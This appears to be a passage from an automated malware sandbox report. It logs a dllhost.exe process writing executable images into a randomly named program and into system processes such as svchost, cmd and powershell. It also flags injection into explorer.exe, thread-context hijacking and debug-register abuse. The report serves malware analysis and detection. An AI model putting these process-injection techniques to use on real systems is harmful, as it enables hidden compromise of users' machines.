Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1420000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1440000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 360000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 380000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 13A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 13C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 590000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 5B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 700000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 720000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 920000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 940000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: E10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1210000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1230000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1440000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 2F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1450000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 3A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 360000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1250000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 280000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 10F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: BA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 2A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1170000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 2C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1220000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: CF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: D50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: C00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: A60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1040000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1440000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1030000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 2F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: A00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1450000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 790000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 3A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: B00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 360000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1250000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 860000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 280000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 810000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 10F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1370000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: BA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 11D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 2A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: B20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1300000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1170000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 380000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 2C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 11D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 13C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 11A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1220000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 360000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1100000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: CF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 810000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 14A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: D50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1230000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: C00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: AC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: A60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1100000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1040000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: BD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 360000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 790000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1130000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: A10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: BA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1370000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 11D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1020000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: B20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 280000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1300000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 380000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1FED7750000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 178DCD40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 11A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 360000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 224138D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1100000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 810000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 2BCD7E00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2125F030000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1230000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1C2C2310000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 26504E70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: AC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: BD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 360000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1130000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: A10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1FED7750000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 178DCD40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 224138D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 2BCD7E00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2125F030000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1C2C2340000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 26504E70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 16CE5E20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: unknown base: CB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 4EE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 300000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 2B90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: unknown base: CB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 2E10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 23BCC520000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 23BCC550000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 1D865090000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 207F0520000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 199015D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 207F2840000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 1CB2E610000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 1CB2E640000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 188D6710000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 29F37400000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 28DE3D50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 28DFE070000 value starts with: 4D5A

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Windows\System32\dllhost.exe	Memory written: PID: 2580 base: 32F0000 value: 4D
Source: C:\Windows\System32\dllhost.exe	Memory written: PID: 2580 base: 32F0000 value: 4D

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread register set: target process: 5968	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread register set: target process: 6808
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread register set: target process: 2844

Sets debug register (to hijack the execution of another thread)

